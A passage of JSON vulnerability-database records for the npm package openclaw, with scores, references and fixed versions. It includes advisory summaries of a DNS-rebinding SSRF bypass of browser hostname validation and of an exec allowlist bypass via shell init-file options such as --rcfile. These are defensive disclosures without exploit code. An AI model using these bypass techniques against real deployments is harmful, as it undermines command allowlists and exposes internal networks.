g_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-474h-prjg-mmw3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["GHSA-474h-prjg-mmw3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7pqs-17nm-duf1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89179?format=json","vulnerability_id":"VCID-7snr-fn3u-x3b8","summary":"OpenClaw: Browser SSRF hostname validation could be bypassed by DNS rebinding\n## Summary\n\nBrowser SSRF hostname validation could be bypassed by DNS rebinding.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nBrowser navigation policy could validate a hostname/IP resolution that differed from the address Chromium ultimately used, allowing DNS rebinding style SSRF pivots.\n\n## Technical Details\n\nThe fix tightens strict browser hostname navigation so unallowlisted hostname URLs fail closed under restrictive policy.\n\n## Fix\n\nThe issue was fixed in #64367. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `121c452d666d4749744dc2089287d0227aae2ed3`\n- PR: #64367\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43582","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09978","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09994","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11564","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43582"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3"},{"reference_url":"https://github.com/openclaw/openclaw/pull/64367","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/64367"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43582","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43582"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass"},{"reference_url":"https://github.com/advisories/GHSA-xq94-r468-qwgj","reference_id":"GHSA-xq94-r468-qwgj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xq94-r468-qwgj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43582","GHSA-xq94-r468-qwgj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7snr-fn3u-x3b8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89612?format=json","vulnerability_id":"VCID-7wmr-v7zb-6fc9","summary":"OpenClaw: Shell init-file options could satisfy exec allowlist script matching\n## Summary\n\nBefore OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as `--rcfile`, `--init-file`, and `--startup-file` could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first.\n\n## Impact\n\nThis issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `0c8375424620e12777ef24c162eedc7e9fcfd7e3` — reject shell init-file script matches\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @cyjhhh for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41392","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07055","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07045","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.0706","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41392"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd